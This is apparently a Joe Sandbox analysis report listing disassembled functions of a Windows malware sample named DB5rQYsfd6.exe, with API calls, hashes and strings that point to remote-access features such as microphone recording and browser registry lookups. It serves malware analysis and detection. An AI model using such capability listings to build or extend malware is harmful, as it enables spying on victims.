                                • String ID: 0zS$8:G
                                • API String ID: 1649129571-675047323
                                • Opcode ID: 8034329e0f87f2863c2184890033f37175777bc9733c74599dc8fbfb11b73b48
                                • Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
                                • Opcode Fuzzy Hash: 8034329e0f87f2863c2184890033f37175777bc9733c74599dc8fbfb11b73b48
                                • Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\DB5rQYsfd6.exe,00000104), ref: 00440975
                                • _free.LIBCMT ref: 00440A40
                                • _free.LIBCMT ref: 00440A4A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\Users\user\Desktop\DB5rQYsfd6.exe$%R
                                • API String ID: 2506810119-216988873
                                • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                • Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
                                • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                • Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                  • Part of subcall function 0044C257: _abort.LIBCMT ref: 0044C289
                                  • Part of subcall function 0044C257: _free.LIBCMT ref: 0044C2BD
                                  • Part of subcall function 0044BECC: GetOEMCP.KERNEL32(00000000,?,?,0044C155,?), ref: 0044BEF7
                                • _free.LIBCMT ref: 0044C1B0
                                • _free.LIBCMT ref: 0044C1E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorLast_abort
                                • String ID: pF$KS$KS
                                • API String ID: 2991157371-1119215651
                                • Opcode ID: 97d7db50b82cccbee5169bb68c5bf7844dd74d9bc7eda6e9766878cece535fa3
                                • Instruction ID: fe15ecdc59135b682bea8f5676c8c6c36af8c828548cffef148b997f3b02a595
                                • Opcode Fuzzy Hash: 97d7db50b82cccbee5169bb68c5bf7844dd74d9bc7eda6e9766878cece535fa3
                                • Instruction Fuzzy Hash: 3431E931901104AFFB50EF9AD481B5A77F4DF40325F29409FE5149B252EB7A9D40CF48
                                APIs
                                  • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,@8T,00471FFC), ref: 00412030
                                  • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                  • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                  • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                  • Part of subcall function 00419F23: IsWow64Process.KERNEL32(00000000,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F3B
                                • _wcslen.LIBCMT ref: 00419744
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                • String ID: .exe$@8T$program files (x86)\$program files\
                                • API String ID: 3286818993-4115660052
                                • Opcode ID: db6bdd67a7951637e261c990a77772a43d8ef49e9346aff36479599785361708
                                • Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
                                • Opcode Fuzzy Hash: db6bdd67a7951637e261c990a77772a43d8ef49e9346aff36479599785361708
                                • Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @!S
                                • API String ID: 0-4045816191
                                • Opcode ID: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                                • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
                                • Opcode Fuzzy Hash: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                                • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSizeSleep
                                • String ID: h G
                                • API String ID: 1958988193-3300504347
                                • Opcode ID: 64ddeb584e83f1d932ac6fa5b59c4334acd5bdbaabeabc2d1db5fab4724845ed
                                • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                                • Opcode Fuzzy Hash: 64ddeb584e83f1d932ac6fa5b59c4334acd5bdbaabeabc2d1db5fab4724845ed
                                • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
                                APIs
                                • RegisterClassExA.USER32(00000030), ref: 0041B310
                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                • GetLastError.KERNEL32 ref: 0041B335
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ClassCreateErrorLastRegisterWindow
                                • String ID: 0$MsgWindowClass
                                • API String ID: 2877667751-2410386613
                                • Opcode ID: 98acc1d12319c165810c3a8101ac83cded611685f47401b5bc5866d6e0782eef
                                • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                                • Opcode Fuzzy Hash: 98acc1d12319c165810c3a8101ac83cded611685f47401b5bc5866d6e0782eef
                                • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                                  • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                                • _UnwindNestedFrames.LIBCMT ref: 00437631
                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                                • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                • String ID: /zC
                                • API String ID: 2633735394-4132788633
                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                                APIs
                                • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                                • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                                • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                                • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: MetricsSystem
                                • String ID: ]tA
                                • API String ID: 4116985748-3517819141
                                • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                                • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,@8T,00471FFC), ref: 00412030
                                • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: @8T$http\shell\open\command
                                • API String ID: 3677997916-1831923547
                                • Opcode ID: 02d9583b321f90b8fde47cd3c5079fbeabf7c3eeeb86fcf6652fd9b53942e913
                                • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
                                • Opcode Fuzzy Hash: 02d9583b321f90b8fde47cd3c5079fbeabf7c3eeeb86fcf6652fd9b53942e913
                                • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                                • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
                                • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,00000000,00000000,00000000), ref: 00405100
                                • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,00000000,00000000,00000000), ref: 0040510C
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,00000000,00000000,00000000), ref: 00405117
                                • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,00000000,00000000,00000000), ref: 00405120
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                Strings
                                • Connection KeepAlive | Disabled, xrefs: 004050D9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                • String ID: Connection KeepAlive | Disabled
                                • API String ID: 2993684571-3818284553
                                • Opcode ID: 85289c313b9b8f3daf800e35edf6731a0ae2994a3e42f41d2c952085963ed016
                                • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
                                • Opcode Fuzzy Hash: 85289c313b9b8f3daf800e35edf6731a0ae2994a3e42f41d2c952085963ed016
                                • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
                                APIs
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
                                • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
                                • Sleep.KERNEL32(00002710), ref: 00418DBD
                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                • String ID: Alarm triggered
                                • API String ID: 614609389-2816303416
                                • Opcode ID: ec9665da0830ca0d42ab207d8f86327420e3023eb33c264484c3245109a19886
                                • Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
                                • Opcode Fuzzy Hash: ec9665da0830ca0d42ab207d8f86327420e3023eb33c264484c3245109a19886
                                • Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                                • Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
                                • Opcode Fuzzy Hash: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                                • Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
                                APIs
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                • _free.LIBCMT ref: 00442318
                                • _free.LIBCMT ref: 0044232F
                                • _free.LIBCMT ref: 0044234E
                                • _free.LIBCMT ref: 00442369
                                • _free.LIBCMT ref: 00442380
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$AllocateHeap
                                • String ID:
                                • API String ID: 3033488037-0
                                • Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                • Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
                                • Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                • Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                • Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
                                • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                • Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
                                • __alloca_probe_16.LIBCMT ref: 0044E391
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
                                • __freea.LIBCMT ref: 0044E3FD
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                • String ID:
                                • API String ID: 313313983-0
                                • Opcode ID: 948daca83ef3f9aa8265cebafcc6032cf42c47e18cc2a336b1be51d4bcc73cbf
                                • Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
                                • Opcode Fuzzy Hash: 948daca83ef3f9aa8265cebafcc6032cf42c47e18cc2a336b1be51d4bcc73cbf
                                • Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
                                APIs
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                                • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                                • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
                                • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
                                • waveInStart.WINMM ref: 00401CDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
